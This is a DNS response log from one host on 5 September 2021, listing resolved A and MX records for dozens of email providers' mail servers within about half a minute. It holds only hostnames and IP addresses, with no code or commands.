Sep 5, 2021 15:52:13.542862892 CEST	8.8.8.8	192.168.2.4	0x59bc	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.542862892 CEST	8.8.8.8	192.168.2.4	0x59bc	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.542862892 CEST	8.8.8.8	192.168.2.4	0x59bc	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.542862892 CEST	8.8.8.8	192.168.2.4	0x59bc	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.542862892 CEST	8.8.8.8	192.168.2.4	0x59bc	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.727952003 CEST	8.8.8.8	192.168.2.4	0x7041	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.826129913 CEST	8.8.8.8	192.168.2.4	0x774a	No error (0)	cxr.mx.a.cloudfilter.net		52.73.137.222	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.826129913 CEST	8.8.8.8	192.168.2.4	0x774a	No error (0)	cxr.mx.a.cloudfilter.net		34.212.80.54	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.826129913 CEST	8.8.8.8	192.168.2.4	0x774a	No error (0)	cxr.mx.a.cloudfilter.net		18.209.118.139	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.826129913 CEST	8.8.8.8	192.168.2.4	0x774a	No error (0)	cxr.mx.a.cloudfilter.net		35.162.106.154	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.118148088 CEST	8.8.8.8	192.168.2.4	0x5707	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.237148046 CEST	8.8.8.8	192.168.2.4	0x9be0	No error (0)	fastscreeens.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:14.291197062 CEST	8.8.8.8	192.168.2.4	0x15c	No error (0)	mx.powered.name		62.141.42.208	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.509857893 CEST	8.8.8.8	192.168.2.4	0x9e05	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.762289047 CEST	8.8.8.8	192.168.2.4	0x1c69	No error (0)	e.gsasearchengineranker.site			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:14.762289047 CEST	8.8.8.8	192.168.2.4	0x1c69	No error (0)	e.gsasearchengineranker.site			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:14.811528921 CEST	8.8.8.8	192.168.2.4	0x28d7	No error (0)	mx37.mb5p.com		37.139.4.134	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.811528921 CEST	8.8.8.8	192.168.2.4	0x28d7	No error (0)	mx37.mb5p.com		68.183.127.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.811528921 CEST	8.8.8.8	192.168.2.4	0x28d7	No error (0)	mx37.mb5p.com		143.198.175.12	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.811528921 CEST	8.8.8.8	192.168.2.4	0x28d7	No error (0)	mx37.mb5p.com		157.230.233.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.811528921 CEST	8.8.8.8	192.168.2.4	0x28d7	No error (0)	mx37.mb5p.com		37.139.4.118	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.811528921 CEST	8.8.8.8	192.168.2.4	0x28d7	No error (0)	mx37.mb5p.com		37.139.4.171	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.811528921 CEST	8.8.8.8	192.168.2.4	0x28d7	No error (0)	mx37.mb5p.com		134.209.79.108	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:14.811528921 CEST	8.8.8.8	192.168.2.4	0x28d7	No error (0)	mx37.mb5p.com		37.139.4.163	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.015840054 CEST	8.8.8.8	192.168.2.4	0xa385	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.213984966 CEST	8.8.8.8	192.168.2.4	0xe3a7	No error (0)	mx.lycos.com.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.488960981 CEST	8.8.8.8	192.168.2.4	0xc7cb	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.540066004 CEST	8.8.8.8	192.168.2.4	0x2cc6	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.700700998 CEST	8.8.8.8	192.168.2.4	0x6b44	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.929060936 CEST	8.8.8.8	192.168.2.4	0x819a	No error (0)	emig.freenet.de		195.4.92.216	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.929060936 CEST	8.8.8.8	192.168.2.4	0x819a	No error (0)	emig.freenet.de		195.4.92.215	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.929060936 CEST	8.8.8.8	192.168.2.4	0x819a	No error (0)	emig.freenet.de		195.4.92.218	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:15.929060936 CEST	8.8.8.8	192.168.2.4	0x819a	No error (0)	emig.freenet.de		195.4.92.217	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.051336050 CEST	8.8.8.8	192.168.2.4	0x9e32	No error (0)	smtp-in.sfr.fr		93.17.128.123	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.051336050 CEST	8.8.8.8	192.168.2.4	0x9e32	No error (0)	smtp-in.sfr.fr		93.17.128.165	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.182193995 CEST	8.8.8.8	192.168.2.4	0x5daf	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.182193995 CEST	8.8.8.8	192.168.2.4	0x5daf	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.182193995 CEST	8.8.8.8	192.168.2.4	0x5daf	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.182193995 CEST	8.8.8.8	192.168.2.4	0x5daf	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.182193995 CEST	8.8.8.8	192.168.2.4	0x5daf	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.182193995 CEST	8.8.8.8	192.168.2.4	0x5daf	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.182193995 CEST	8.8.8.8	192.168.2.4	0x5daf	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.182193995 CEST	8.8.8.8	192.168.2.4	0x5daf	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.195386887 CEST	8.8.8.8	192.168.2.4	0x6721	No error (0)	emig.freenet.de		195.4.92.216	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.195386887 CEST	8.8.8.8	192.168.2.4	0x6721	No error (0)	emig.freenet.de		195.4.92.215	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.195386887 CEST	8.8.8.8	192.168.2.4	0x6721	No error (0)	emig.freenet.de		195.4.92.218	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.195386887 CEST	8.8.8.8	192.168.2.4	0x6721	No error (0)	emig.freenet.de		195.4.92.217	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.351855993 CEST	8.8.8.8	192.168.2.4	0x6e64	No error (0)	smtp-in.sfr.fr		93.17.128.165	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.351855993 CEST	8.8.8.8	192.168.2.4	0x6e64	No error (0)	smtp-in.sfr.fr		93.17.128.123	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.509749889 CEST	8.8.8.8	192.168.2.4	0xcbcc	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.509749889 CEST	8.8.8.8	192.168.2.4	0xcbcc	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.509749889 CEST	8.8.8.8	192.168.2.4	0xcbcc	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.509749889 CEST	8.8.8.8	192.168.2.4	0xcbcc	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.509749889 CEST	8.8.8.8	192.168.2.4	0xcbcc	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.509749889 CEST	8.8.8.8	192.168.2.4	0xcbcc	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.572238922 CEST	8.8.8.8	192.168.2.4	0x2ba1	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:16.838917017 CEST	8.8.8.8	192.168.2.4	0xefc5	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.068882942 CEST	8.8.8.8	192.168.2.4	0x3ae1	No error (0)	acomsltd.co.uk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:17.068882942 CEST	8.8.8.8	192.168.2.4	0x3ae1	No error (0)	acomsltd.co.uk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:17.124594927 CEST	8.8.8.8	192.168.2.4	0x20f5	No error (0)	mx0.123-reg.co.uk		94.136.40.235	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.404895067 CEST	8.8.8.8	192.168.2.4	0xb055	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.505534887 CEST	8.8.8.8	192.168.2.4	0xccb5	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.677819967 CEST	8.8.8.8	192.168.2.4	0xeb47	No error (0)	htmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		18.237.235.220	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		34.222.93.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.721110106 CEST	8.8.8.8	192.168.2.4	0xe3cf	No error (0)	mail.mailerhost.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.733098984 CEST	8.8.8.8	192.168.2.4	0x1f1d	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.759254932 CEST	8.8.8.8	192.168.2.4	0x5cbb	No error (0)	outlook-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.759254932 CEST	8.8.8.8	192.168.2.4	0x5cbb	No error (0)	outlook-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:17.843432903 CEST	8.8.8.8	192.168.2.4	0xb2e7	No error (0)	mx.lycos.de.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:18.118305922 CEST	8.8.8.8	192.168.2.4	0x9a24	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:18.252819061 CEST	8.8.8.8	192.168.2.4	0xc22a	No error (0)	mx.lb.btinternet.com		213.120.69.5	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:18.488920927 CEST	8.8.8.8	192.168.2.4	0x5e59	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:18.913739920 CEST	8.8.8.8	192.168.2.4	0x1c78	No error (0)	mx00.mail.com		74.208.5.20	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.273617029 CEST	8.8.8.8	192.168.2.4	0x6745	No error (0)	cxr.mx.a.cloudfilter.net		52.73.137.222	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.273617029 CEST	8.8.8.8	192.168.2.4	0x6745	No error (0)	cxr.mx.a.cloudfilter.net		18.209.118.139	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.273617029 CEST	8.8.8.8	192.168.2.4	0x6745	No error (0)	cxr.mx.a.cloudfilter.net		34.212.80.54	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.273617029 CEST	8.8.8.8	192.168.2.4	0x6745	No error (0)	cxr.mx.a.cloudfilter.net		35.162.106.154	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.700599909 CEST	8.8.8.8	192.168.2.4	0x5060	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.815450907 CEST	8.8.8.8	192.168.2.4	0x609f	No error (0)	mx1.seznam.cz		77.75.76.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:19.815450907 CEST	8.8.8.8	192.168.2.4	0x609f	No error (0)	mx1.seznam.cz		77.75.78.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:21.439002991 CEST	8.8.8.8	192.168.2.4	0x9884	No error (0)	energyjustice.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:21.593103886 CEST	8.8.8.8	192.168.2.4	0xa55e	No error (0)	energyjustice.net		69.73.133.204	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:22.032155991 CEST	8.8.8.8	192.168.2.4	0x216f	No error (0)	bellatlantic.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:22.070002079 CEST	8.8.8.8	192.168.2.4	0x7d3d	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:22.070002079 CEST	8.8.8.8	192.168.2.4	0x7d3d	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:22.070002079 CEST	8.8.8.8	192.168.2.4	0x7d3d	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:22.070002079 CEST	8.8.8.8	192.168.2.4	0x7d3d	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:22.070002079 CEST	8.8.8.8	192.168.2.4	0x7d3d	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:22.070002079 CEST	8.8.8.8	192.168.2.4	0x7d3d	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:22.969337940 CEST	8.8.8.8	192.168.2.4	0x930	No error (0)	xtra.co.nz			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:23.005992889 CEST	8.8.8.8	192.168.2.4	0x3320	No error (0)	mx.xtra.co.nz		210.55.143.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.787357092 CEST	8.8.8.8	192.168.2.4	0x9554	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.813404083 CEST	8.8.8.8	192.168.2.4	0xf53	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.819880962 CEST	8.8.8.8	192.168.2.4	0x83d1	No error (0)	mx.wp.pl		212.77.101.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:25.962769032 CEST	8.8.8.8	192.168.2.4	0xd2c0	No error (0)	qannection.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:25.962769032 CEST	8.8.8.8	192.168.2.4	0xd2c0	No error (0)	qannection.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:26.005496979 CEST	8.8.8.8	192.168.2.4	0xafe5	No error (0)	smtp-in.sfr.fr		93.17.128.123	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.005496979 CEST	8.8.8.8	192.168.2.4	0xafe5	No error (0)	smtp-in.sfr.fr		93.17.128.165	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.013926029 CEST	8.8.8.8	192.168.2.4	0xd040	No error (0)	smtp.secureserver.net		68.178.213.37	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.013926029 CEST	8.8.8.8	192.168.2.4	0xd040	No error (0)	smtp.secureserver.net		68.178.213.203	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.013926029 CEST	8.8.8.8	192.168.2.4	0xd040	No error (0)	smtp.secureserver.net		72.167.238.29	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.145761013 CEST	8.8.8.8	192.168.2.4	0x9e0e	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.433564901 CEST	8.8.8.8	192.168.2.4	0x1155	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:26.765907049 CEST	8.8.8.8	192.168.2.4	0x9f3d	No error (0)	mx00.emig.kundenserver.de		212.227.15.40	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:27.419226885 CEST	8.8.8.8	192.168.2.4	0xa033	No error (0)	entertainmentbenefits.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:27.419226885 CEST	8.8.8.8	192.168.2.4	0xa033	No error (0)	entertainmentbenefits.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:27.464190006 CEST	8.8.8.8	192.168.2.4	0x6548	No error (0)	d192721a.ess.barracudanetworks.com		209.222.82.252	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:27.464190006 CEST	8.8.8.8	192.168.2.4	0x6548	No error (0)	d192721a.ess.barracudanetworks.com		209.222.82.253	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:27.464190006 CEST	8.8.8.8	192.168.2.4	0x6548	No error (0)	d192721a.ess.barracudanetworks.com		209.222.82.255	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:30.206458092 CEST	8.8.8.8	192.168.2.4	0xfa9e	No error (0)	teerwater.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:30.206458092 CEST	8.8.8.8	192.168.2.4	0xfa9e	No error (0)	teerwater.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:30.206458092 CEST	8.8.8.8	192.168.2.4	0xfa9e	No error (0)	teerwater.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:30.250510931 CEST	8.8.8.8	192.168.2.4	0xecdb	No error (0)	mx1c40.carrierzone.com		64.29.151.236	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:30.890263081 CEST	8.8.8.8	192.168.2.4	0xabbd	No error (0)	certifiedtgp.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:30.939141989 CEST	8.8.8.8	192.168.2.4	0x52bf	No error (0)	aa.prof-investment.ru		51.255.25.248	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.436853886 CEST	8.8.8.8	192.168.2.4	0x767e	No error (0)	uk.flu.cc			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:31.491204977 CEST	8.8.8.8	192.168.2.4	0x7832	No error (0)	mx156.hostedmxserver.com		37.139.4.118	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.491204977 CEST	8.8.8.8	192.168.2.4	0x7832	No error (0)	mx156.hostedmxserver.com		37.139.4.134	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.491204977 CEST	8.8.8.8	192.168.2.4	0x7832	No error (0)	mx156.hostedmxserver.com		157.230.233.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.491204977 CEST	8.8.8.8	192.168.2.4	0x7832	No error (0)	mx156.hostedmxserver.com		37.139.4.171	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.491204977 CEST	8.8.8.8	192.168.2.4	0x7832	No error (0)	mx156.hostedmxserver.com		68.183.127.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.491204977 CEST	8.8.8.8	192.168.2.4	0x7832	No error (0)	mx156.hostedmxserver.com		134.209.79.108	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.491204977 CEST	8.8.8.8	192.168.2.4	0x7832	No error (0)	mx156.hostedmxserver.com		143.198.175.12	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:31.491204977 CEST	8.8.8.8	192.168.2.4	0x7832	No error (0)	mx156.hostedmxserver.com		37.139.4.163	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:32.110743046 CEST	8.8.8.8	192.168.2.4	0x83bb	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:32.957901955 CEST	8.8.8.8	192.168.2.4	0xf8b4	No error (0)	shaw.ca			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:33.004232883 CEST	8.8.8.8	192.168.2.4	0x3a7f	No error (0)	shw-central.mx.a.cloudfilter.net		3.96.81.40	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:33.004232883 CEST	8.8.8.8	192.168.2.4	0x3a7f	No error (0)	shw-central.mx.a.cloudfilter.net		15.222.199.59	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:33.431291103 CEST	8.8.8.8	192.168.2.4	0x955e	No error (0)	mx-rogers.mail.am0.yahoodns.net		67.195.204.82	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:33.431291103 CEST	8.8.8.8	192.168.2.4	0x955e	No error (0)	mx-rogers.mail.am0.yahoodns.net		67.195.228.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:33.966917992 CEST	8.8.8.8	192.168.2.4	0x862a	No error (0)	family.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:34.011877060 CEST	8.8.8.8	192.168.2.4	0x360e	No error (0)	generalsmtp.disney.com		139.104.174.134	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:35.472206116 CEST	8.8.8.8	192.168.2.4	0x22fb	No error (0)	lowes.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:35.472206116 CEST	8.8.8.8	192.168.2.4	0x22fb	No error (0)	lowes.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:35.621944904 CEST	8.8.8.8	192.168.2.4	0xa3e3	No error (0)	mxb-00308801.gslb.pphosted.com		205.220.164.82	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:37.210290909 CEST	8.8.8.8	192.168.2.4	0xe823	No error (0)	invitel.hu			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:37.210290909 CEST	8.8.8.8	192.168.2.4	0xe823	No error (0)	invitel.hu			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:37.284913063 CEST	8.8.8.8	192.168.2.4	0xf858	No error (0)	invitel.inmx.digicable.hu		92.249.128.164	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:37.683386087 CEST	8.8.8.8	192.168.2.4	0x1b4d	No error (0)	katamail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:37.683386087 CEST	8.8.8.8	192.168.2.4	0x1b4d	No error (0)	katamail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:37.724081039 CEST	8.8.8.8	192.168.2.4	0xa326	No error (0)	cmgw-km-1.mail.tiscali.it		213.205.35.83	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.344532967 CEST	8.8.8.8	192.168.2.4	0xf438	No error (0)	gotmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:38.386722088 CEST	8.8.8.8	192.168.2.4	0xb675	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:40.247360945 CEST	8.8.8.8	192.168.2.4	0x1bc7	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
